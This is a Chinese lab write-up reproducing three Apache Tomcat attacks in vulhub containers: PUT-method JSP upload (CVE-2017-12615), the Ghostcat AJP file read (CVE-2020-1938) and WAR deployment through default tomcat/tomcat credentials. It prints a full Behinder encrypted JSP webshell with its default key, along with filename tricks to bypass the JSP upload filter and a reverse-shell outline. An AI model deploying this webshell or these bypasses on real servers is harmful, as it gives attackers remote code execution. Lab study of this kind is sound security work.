Tomcat漏洞复现CVE-2017-12615&CVE-2020-1938&弱口令

0x00 前言

        今天来复现tomcat的三个漏洞

--学如逆水行舟，不进则退

0x01 CVE-2017-12615

1.漏洞简介

由于配置不当（非默认配置），将配置文件conf/web.xml中的readonly设置为了 false，导致可以使用PUT方法上传任意文件，但限制了jsp后缀的上传

根据描述，在 Windows 服务器下，将 readonly 参数设置为 false 时，即可通过 PUT 方式创建一个 JSP 文件，并可以执行任意代码

通过阅读 conf/web.xml 文件，可以发现，默认 readonly 为 true，当 readonly 设置为 false 时，可以通过 PUT / DELETE 进行文件操控

2.影响版本

apche tomcat 7.0.0-7.0.81

3.漏洞复现

环境搭建(此处省略，使用vulhub搭建)，出现以下页面，说明搭建成功

 使用bp抓包进行文件上传

注意:::需要改成PUT请求方式，注意点已在图中标记，出现201，应该是上传成功了

 进去docker容器中看一下

使用以下命令进去容器之后，需到容器的/usr/local/tomcat/webapps/ROOT中查看

docker ps -a    //查看容器ID

docker exec -it 容器ID bash     // 进去容器

 

 尝试抓包写入冰蝎的jsp木马

注意:由于限制了jsp后缀的上传，这里需要绕过，绕过方式有三种

1.Windows下不允许文件以空格结尾以PUT /a001.jsp%20 HTTP/1.1上传到 Windows会被自动去掉末尾空格  
2.Windows NTFS流Put/a001.jsp::$DATA HTTP/1.1  
3. /在文件名中是非法的，也会被去除（Linux/Windows）Put/a001.jsp/http:/1.1  

冰蝎jsp木马如下：

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

 使用bp抓包写入,如下图(注意点已在图中标出)

 使用冰蝎连接

 0x02 CVE-2020-1938

漏洞简介

CVE-2020-1938为Tomcat AJP文件包含漏洞。由长亭科技安全研究员发现的存在于 Tomcat中的安全漏洞，由于 Tomcat AJP协议设计上存在缺陷，攻击者通过 Tomcat AJP Connector可以读取或包含 Tomcat上所有 webapp目录下的任意文件，例如可以读取 webapp配置文件或源码。

此外在目标应用有文件上传功能的情况下，配合文件包含的利用还可以达到远程代码执行的危害。

影响版本

 Apache Tomcat 6
7 <=  Apache Tomcat < 7.0.100
8 <=  Apache Tomcat  < 8.5.51
9 <=  Apache Tomcat  < 9.0.31

漏洞复现

环境搭建(这里同样使用vulhub搭建)，出现以下图片，说明搭建成功

使用POC进行漏洞检测，若存在漏洞则可以查看webapps目录下的所有文件

 工具下载地址:https://github.com/YDHCUI/CNVD-2020-10487-Tomcat-Ajp-lfi  

这里用使用python2环境

这里有漏洞之后，可以进行反弹shell以及msf拿会话，但是由于得结合文件上传漏洞，这里就不演示了，简单说一下

 一:先上传一个txt文件，反弹shell的命令需进行base64编码

 二:nc监听之后，使用上面的脚本-f参数后改为上传的文件即可

0x03 弱口令war包部署

漏洞简介

在tomcat8环境下默认后台的密码为tomcat/tomcat，未修改造成未授权即可进入后台

影响版本 

全版本

漏洞复现

环境搭建（既然使用vulhub搭建tomcat8环境），出现以下图片，说明搭建成功

搭建好之后又，访问http:ip:8080/manager/html，出现下图，进行登录

默认密码tomcat，tomcat，进入后台之后，有一个上传war包的地方，如下图

 这里同样使用冰蝎的jsp木马，使用一下命令，将jsp文件打包为war包（木马内容和上面的一样）

jar -cvf shell.war. shell.jsp

 进行上传war包，部署成功之后，会出现如下图

 访问jsp木马，不报错即代表成功(此处注意目录)

 使用冰蝎连接

 有帮助的话，点个关注呗